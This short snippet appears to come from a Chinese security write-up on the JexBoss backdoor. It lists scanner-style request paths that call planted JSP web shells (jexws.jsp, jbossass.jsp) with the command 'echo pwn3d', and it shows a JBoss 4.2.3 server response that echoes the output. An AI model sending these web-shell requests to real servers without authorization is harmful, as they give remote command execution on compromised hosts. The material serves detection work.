JexBoss 后门
代码语言:javascript复制https://us-cert.cisa.gov/ncas/analysis-reports/AR18-312A - "{{BaseURL}}/jexws/jexws.jsp?ppp=echo pwn3d"
- "{{BaseURL}}/jexws1/jexws1.jsp?ppp=echo pwn3d"
- "{{BaseURL}}/jexws2/jexws2.jsp?ppp=echo pwn3d"
- "{{BaseURL}}/jexws3/jexws3.jsp?ppp=echo pwn3d"
- "{{BaseURL}}/jexws4/jexws4.jsp?ppp=echo pwn3d"
- "{{BaseURL}}/jexinv4/jexinv4.jsp?ppp=echo pwn3d"
- "{{BaseURL}}/jbossass/jbossass.jsp?ppp=echo pwn3d"HTTP/1.1 200 OK
Connection: close
Access-Control-Allow-Headers: Content-Type, X-Requested-With, accept-version
Access-Control-Allow-Methods: GET, PUT, OPTIONS, DELETE, POST
Access-Control-Allow-Origin: https://xxx.xxx.xxx.xxx/
Access-Control-Request-Method: GET, PUT, OPTIONS, DELETE, POST
Content-Type: text/html;charset=UTF-8
Date: Wed, 01 Dec 2021 12:56:36 GMT
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=DD9856CC89D3F9F9F63C0CBD8A; Path=/
Strict-Transport-Security: max-age=15552000; includeSubDomains
Vary: Accept-Encoding
X-Frame-Options: sameorigin
X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181417)/JBossWeb-2.0
<pre> pwn3d
